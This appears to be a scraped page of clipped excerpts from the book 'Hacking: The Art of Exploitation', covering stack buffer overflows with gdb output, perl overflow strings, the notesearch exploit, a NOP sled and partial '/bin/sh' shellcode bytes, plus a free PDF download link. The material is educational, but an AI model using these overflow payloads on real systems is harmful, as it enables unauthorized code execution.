Hacking - The Art of Exploitation, 2nd Edition
Exploitation 127 11 if(strcmp(password_buffer, "brillig") == 0) 12 auth_flag = 1; 13 if(strcmp(password_buffer, "outgrabe") == 0 ...
128 0x300 As expected, the overflow cannot disturb the auth_flag variable, since it’s located before the buffer. But another exe ...
Exploitation 129 12 auth_flag = 1; 13 if(strcmp(password_buffer, "outgrabe") == 0) 14 auth_flag = 1; 15 16 return auth_flag; 17 ...
130 0x300 (gdb) c Continuing. Breakpoint 2, check_authentication (password=0xbffff9b7 'A' <repeats 30 times>) at auth_over ...
Exploitation 131 0xbffff7d0: 0xb7ff47b0 0x08048510 0xbffff7e8 0x080484bb 0xbffff7e0: 0xbffff9b7 0x08048510 0xbffff848 0xb7eafeb ...
132 0x300 Notice the two lines shown in bold on page 131. At this point, the EAX register contains a pointer to the first comman ...
Exploitation 133 (gdb) cont Continuing. Breakpoint 3, check_authentication (password=0xbffff9b7 'A' <repeats 30 times>) at ...
134 0x300 reader@hacking:~/booksrc $ perl -e 'print "\x41" x 20;' AAAAAAAAAAAAAAAAAAAA In addition, string concatenation can be ...
Exploitation 135 (gdb) quit reader@hacking:~/booksrc $ ./overflow_example $(perl -e 'print "A"x20. "ABCD"') [BEFORE] buffer_two ...
136 0x300 0x0804848d <main+25>: mov eax,DWORD PTR [eax] 0x0804848f <main+27>: mov DWORD PTR [esp+4],eax 0x08048493 & ...
Exploitation 137 The notesearch program is vulnerable to a buffer overflow on the line marked in bold here. int main(int argc, c ...
138 0x300 20 offset = atoi(argv[1]); (gdb) 21 22 ret = (unsigned int) &i - offset; // Set return address. 23 24 for(i=0; i & ...
Exploitation 139 (gdb) cont Continuing. Breakpoint 2, main (argc=1, argv=0xbffff894) at exploit_notesearch.c:27 27 memcpy(buffer ...
140 0x300 called the NOP sled, that can assist with this difficult chicanery. NOP is an assembly instruction that is short for n ...
Exploitation 141 Since the notesearch exploit allows an optional command-line argument to define the offset, different offsets c ...
142 0x300 The function of the for loop should be familiar, even if the syntax is a little different. The shell variable $i itera ...
Exploitation 143 35:.mpg=01;35:.mpeg=01;35:.avi=01;35:.fli=01;35:.gl=01;35:.dl=01;35:.xcf=01;35:.xwd=01; 35:.flac=01;35:.mp3=01; ...
144 0x300 \x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x51\x89\xe2\x53\x89 \xe1\xcd\x80 reader@hacking:~/booksrc $ The first 10 ...
Exploitation 145 A breakpoint is set at the beginning of main(), and the program is run. This will set up memory for the program ...
146 0x300 reader@hacking:~/booksrc $ ./notesearch $(perl -e 'print "\x47\xf9\xff\xbf"x40') [DEBUG] found a 34 byte note for user ...
«
3
4
5
6
7
8
9
10
11
12
»
Free download pdf